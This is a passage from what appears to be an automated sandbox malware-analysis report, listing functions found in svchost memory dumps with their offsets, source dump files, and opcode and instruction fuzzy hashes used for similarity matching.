                                                                                                              • Instruction ID: 7aa6cd4ac2fd8ad313f312f3af233e43676ab2ef84e3b7e8388331fc4c9eb468
                                                                                                              • Opcode Fuzzy Hash: ed2a8d81b5a7072fef0423eba42259129d24d063ad8e6f13851b88de59b7f91c
                                                                                                              • Instruction Fuzzy Hash: 76F08274A14248EBDB04EBB9D905F6EB3F4EF04308F0400A9E911EF2C1EA74E900CB59
                                                                                                              Function 03BAD070 Relevance: .0, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                              • Instruction ID: 81f1272957c0a134c7cdc94abb381e0ff85398bbb287fd9ebefe6a86f87ee159
                                                                                                              • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                              • Instruction Fuzzy Hash: FDF0E53360471467C230AA0D8C15F5BFBACDBD5B74F14436ABA249B2D0DA70A911D7D6
                                                                                                              Function 03BEF72E Relevance: .0, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 76004344d76d10e44630e2c6253ce4d1c3d7ae27db9dba9c9a7bfdd466257dbd
                                                                                                              • Instruction ID: 95cfafd97e43e2583cbbb8be19511018af315b2c24682ea579d21e4ddc121219
                                                                                                              • Opcode Fuzzy Hash: 76004344d76d10e44630e2c6253ce4d1c3d7ae27db9dba9c9a7bfdd466257dbd
                                                                                                              • Instruction Fuzzy Hash: 02F08275A10348ABDB04EBB9D555F9E77F4EF08708F0500A4E545EB280DA74DD019759
                                                                                                              Function 03B30710 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction ID: 3ff06b650ff1dd8cf7e87dfd3ecdd327ea854e51057e7d46c98a687fee37b446
                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction Fuzzy Hash: 71F0E53D304351DBDB15EF19D040A957BE8EF42358F0400F4E8468B300D731E981CB84
                                                                                                              Function 03C037B6 Relevance: .0, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                              • Instruction ID: cb2851ec7414d7da297ec9453fbe6108f86b3d4225d4bb08fc665fd23e71dccb
                                                                                                              • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                              • Instruction Fuzzy Hash: 3FE06D76210250AFE765DB58CE05FA673ECEB00720F180268B125DB0D0DAB0AE40CA64
                                                                                                              Function 03BB4000 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction ID: 94061db74ee17c7dadcb727717fe8cff0d06f8e72e0d1b050e137dc474482d8d
                                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction Fuzzy Hash: 8CE0C2343003058FD715CF1AC040BA2B7B6FFD5A14F68C0B8A8488F206EB72E842CB40
                                                                                                              Function 03BEB3D0 Relevance: .0, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                              • Instruction ID: 931c79758b096e5910d03a29f465af6f359159dff10e1e80b8f1b783f515e29c
                                                                                                              • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                              • Instruction Fuzzy Hash: 80E0CD35244314B7DB22EA44CC00F697B55DB407D4F104071FA0C5E650C671DD51D6D4
                                                                                                              Function 03B2823B Relevance: .0, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction ID: f1ac6105e125fb0b4556380846fbdbe746b3b06ec30d5c67f0e450e14ff98c84
                                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction Fuzzy Hash: 08E08C35901B20EEDB31EF21DC04B527AA5FB48B18F144AF9E08A4E4A48770A891DA48
                                                                                                              Function 03BB92BC Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7d7f61984b3566c060033c1d88b1f15863d22a0c2e9bc722d027a96287cdcd92
                                                                                                              • Instruction ID: c5eb9778552cf4e40cbb76b50cb6d27681f0d42b9c66d18dc474ae0d60dc165f
                                                                                                              • Opcode Fuzzy Hash: 7d7f61984b3566c060033c1d88b1f15863d22a0c2e9bc722d027a96287cdcd92
                                                                                                              • Instruction Fuzzy Hash: 7DF0ED34651B84CFF72ADF04C1E1B6173B9F755B44F5004A8D4468BBA1C73AAD41CA40
                                                                                                              Function 03B32050 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 42ad8b8aeb58af9e2bea13cdf5f23115bc8133d4fed716cd14db55008a3100c4
                                                                                                              • Instruction ID: b20052981d35e50294f1691ba7ef2f28584d5af88964d63cc176c5d20d26235a
                                                                                                              • Opcode Fuzzy Hash: 42ad8b8aeb58af9e2bea13cdf5f23115bc8133d4fed716cd14db55008a3100c4
                                                                                                              • Instruction Fuzzy Hash: EAE0C2322006606BC321FB5DDD00F4A739EEFA5364F044271F1548F690CA70AC10C798
                                                                                                              Function 0041480C Relevance: .0, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7460aa8699ffd5e81ce2d03db0f143f246ad95f6a1000299a56ec2cde561297b
                                                                                                              • Instruction ID: fd7ba7d404b95df717f8813513e414ceff02cf9c7162b241cb907d810a9b51bd
                                                                                                              • Opcode Fuzzy Hash: 7460aa8699ffd5e81ce2d03db0f143f246ad95f6a1000299a56ec2cde561297b
                                                                                                              • Instruction Fuzzy Hash: 45D0A77A802611AB821157318D427C53B70EAA119430400D4D4044B407A234B9594BC1
                                                                                                              Function 03B2A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction ID: 0d3895482cc482285cd20049894b3a49d5362f430e347235b16048df08cc296a
                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction Fuzzy Hash: D7D0223231213093CB28E6506800F63AE05DB81AA8F0E01BC380EE3800C8048C42D2E0
                                                                                                              Function 03B402A0 Relevance: .0, Instructions: 13COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction ID: 276063a8f290c3d9dc687b785806a183262689d72665f3d70ce7598d46cb27e2
                                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction Fuzzy Hash: AED0C935612E80CFD61ACF0DC5A4B16B3B8FB44B48F8504F0E501CBB61D66CD940DE04
                                                                                                              Function 03BB930B Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                              • Instruction ID: c64d1f31e0bd13a9239e98aea0538c5848a1cde8a480b79440af36119daf6b01
                                                                                                              • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                              • Instruction Fuzzy Hash: 75D05E35945AC4CFE727CB08C165BA07BF8F705B44F8900E8E04247BA2C7BC9A84CB10
                                                                                                              Function 03B6C700 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction ID: 8c0aaaca0f5738055bba17cb73b612735c5b0a569e5cf7269eea9e62e4f3aa35
                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction Fuzzy Hash: 18C0123A290748AFC712EA98CD01F027BA9EB98B40F044061F2088B671C631E820EA88
                                                                                                              Function 03B50310 Relevance: .0, Instructions: 11COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction ID: 80ec886c9dac756dc99991b0f64319292b7c28c08c43bcec4f18c450a84d5518
                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction Fuzzy Hash: F2D01236100248EFCB01EF41C890E9A772AFBD8710F148019FD190B6108A31ED62DA50
                                                                                                              Function 03B30750 Relevance: .0, Instructions: 9COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction ID: b9b772419e4f9289e6707cb1996d214d63f1cf012e8e11e13dad9ca1791f1a4e
                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction Fuzzy Hash: 16C04879B01A428FCF15EB2AD2D4F4977E8FB44748F1908E0E809CBB21E624E811DA11
                                                                                                              Function 03B74340 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2eee2f140f31000112948f29498a26ad2418b0614219442ee85ef0dc3155bfe3
                                                                                                              • Instruction ID: b374fb89752f958edceaeebed79a28437bc568d4d082af7be1b1b81311876ba3
                                                                                                              • Opcode Fuzzy Hash: 2eee2f140f31000112948f29498a26ad2418b0614219442ee85ef0dc3155bfe3
                                                                                                              • Instruction Fuzzy Hash: 40900232605804139140B25848C4586400697E0305B95C061E0428559C8B248A569361
                                                                                                              Function 03B73090 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6f55f4f3581c9984b7fa9e8548bc48f68eabd9fa74c9ab1346555f12a47d07e2
                                                                                                              • Instruction ID: dffde8e394dac981a9d66c6f6fdbf96b0009d48ead5774b572daad0dbfce3231
                                                                                                              • Opcode Fuzzy Hash: 6f55f4f3581c9984b7fa9e8548bc48f68eabd9fa74c9ab1346555f12a47d07e2
                                                                                                              • Instruction Fuzzy Hash: AE90022224140C03D140B25884547470007C7D0705F95C061A0028559D87268A65A6B1
                                                                                                              Function 03B73010 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 178c3996533274ca31d9547c8fc46ce9307a9c8282685e0aaec5d02211c50ff3
                                                                                                              • Instruction ID: 4f93126d1c2bd33ed59f3dfd3fa5abb5544664fe90ac5d725124ab2863e9df9a
                                                                                                              • Opcode Fuzzy Hash: 178c3996533274ca31d9547c8fc46ce9307a9c8282685e0aaec5d02211c50ff3
                                                                                                              • Instruction Fuzzy Hash: AA90022220184843D140B3584844B4F410687E1306FD5C069A415A559CCA2589559721
                                                                                                              Function 03B74650 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c08f7629549d93e3d9df518a2ce177909cbe2aa7f2878479fd6ea1d722f392fa
                                                                                                              • Instruction ID: dc4bfbae36228d92660a33f2c606d483f04088c88d9caeef4e33b1917d1ca53c
                                                                                                              • Opcode Fuzzy Hash: c08f7629549d93e3d9df518a2ce177909cbe2aa7f2878479fd6ea1d722f392fa
                                                                                                              • Instruction Fuzzy Hash: B8900262601504434140B2584844446600697E13053D5C165A0558565C87288955D269
                                                                                                              Function 03B72BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0fa4e1d0d11b522c5f1dcd7d35da6adaf2d02f5817920a5e4e272b9542a9f877
                                                                                                              • Instruction ID: 136e07e2dee4fb653b9b0ad084573cbbc4cf73cb2d6eba7ccd60e8da96ded08a
                                                                                                              • Opcode Fuzzy Hash: 0fa4e1d0d11b522c5f1dcd7d35da6adaf2d02f5817920a5e4e272b9542a9f877
                                                                                                              • Instruction Fuzzy Hash: CA90023260540C03D150B2584454786000687D0305F95C061A0028659D87658B55B6A1
                                                                                                              Function 03B72B80 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6bec0c0f51d2a3b843a05b304d4de1bfe1a7b4fe7ef9a5398d87fe088c420a05
                                                                                                              • Instruction ID: c8412e99e05efbcb499b21bcf1fca46c5ceadc1d2c1a63ab7f5d40183b2f99cc
                                                                                                              • Opcode Fuzzy Hash: 6bec0c0f51d2a3b843a05b304d4de1bfe1a7b4fe7ef9a5398d87fe088c420a05
                                                                                                              • Instruction Fuzzy Hash: D990023220140C03D104B25848446C6000687D0305F95C061A602865AE97758991B131
                                                                                                              Function 03B72BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d5053443de5ef9d4b297ab71acadad607605992e41b58e391f074d72cc9f7b40
                                                                                                              • Instruction ID: 79bfa205b471236c5ad3e594b4acf147ae126d246dec556f1a29df5ec32930d7
                                                                                                              • Opcode Fuzzy Hash: d5053443de5ef9d4b297ab71acadad607605992e41b58e391f074d72cc9f7b40
                                                                                                              • Instruction Fuzzy Hash: EE90023220140C03D180B258444468A000687D1305FD5C065A0029659DCB258B59B7A1
                                                                                                              Function 03B72BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 605922e26cec8f0e4a9d8132ad5bf9e72fc280e48625f2cb3187d963a3013266
                                                                                                              • Instruction ID: 30f30c8800d31ab23cc3351f7bfc12def44948aa1b62de065cbdeb254c6b268f
                                                                                                              • Opcode Fuzzy Hash: 605922e26cec8f0e4a9d8132ad5bf9e72fc280e48625f2cb3187d963a3013266
                                                                                                              • Instruction Fuzzy Hash: 2290023220544C43D140B2584444A86001687D0309F95C061A0068699D97358E55F661
                                                                                                              Function 03B72AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 58587a45437ba2e2a1513a552f75d67e0e63520856ade41d353b33fe552e73e6
                                                                                                              • Instruction ID: e8d1a0dd1d1e3fc4e59745c8d39dcd03f97f471b71ce6a677ea992627a726693
                                                                                                              • Opcode Fuzzy Hash: 58587a45437ba2e2a1513a552f75d67e0e63520856ade41d353b33fe552e73e6
                                                                                                              • Instruction Fuzzy Hash: D59002A2201544934500F3588444B4A450687E0305B95C066E1058565CC6358951D135
                                                                                                              Function 03B72AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a73b0e4c98268593a614e000c204aa108f06746ab1cc9e89b3ea0d4e18960bc7
                                                                                                              • Instruction ID: e0db73927bc3f37304f25eda339c5871d563b973377945d4bfaa9ab4e1eab94d
                                                                                                              • Opcode Fuzzy Hash: a73b0e4c98268593a614e000c204aa108f06746ab1cc9e89b3ea0d4e18960bc7
                                                                                                              • Instruction Fuzzy Hash: 81900226221404030145F658064454B044697D63553D5C065F141A595CC73189659321
                                                                                                              Function 03B72AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2208d7a56b82bc35ecb746ac58642bd7d6dfcf124f97340397f6310fccb21de4
                                                                                                              • Instruction ID: 980e79dbfd833cb5605fc2c542076be74fa5674a9ade8af165ba9f2a0cdd2381
                                                                                                              • Opcode Fuzzy Hash: 2208d7a56b82bc35ecb746ac58642bd7d6dfcf124f97340397f6310fccb21de4
                                                                                                              • Instruction Fuzzy Hash: 1D900437311404030105F75C07445470047C7D53553D5C071F101D555CD731CD71D131
                                                                                                              Function 03B739B0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9a67625f6d5a6a77cb64058b22c0bd9c8afe0f49700dd0c98a26fb474c3b9e3a
                                                                                                              • Instruction ID: 4d6aa6816fe29882a3801b9e5e99b8317927aa2cde868f582fa8222d83d4cac6
                                                                                                              • Opcode Fuzzy Hash: 9a67625f6d5a6a77cb64058b22c0bd9c8afe0f49700dd0c98a26fb474c3b9e3a
                                                                                                              • Instruction Fuzzy Hash: 7B90022224545503D150B25C44446564006A7E0305F95C071A0818599D86658955A221
                                                                                                              Function 03B72FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd2af12ae23907019786621ebea54e0139555b9838dec7fc85013a8680549373
                                                                                                              • Instruction ID: b00bfadc0acd02dfb2cf605f7cec2b244ef80db300d907a96184fb30d53d3e29
                                                                                                              • Opcode Fuzzy Hash: fd2af12ae23907019786621ebea54e0139555b9838dec7fc85013a8680549373
                                                                                                              • Instruction Fuzzy Hash: E3900222601404434140B26888849464006ABE1315795C171A099C555D866989659665
                                                                                                              Function 03B72FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
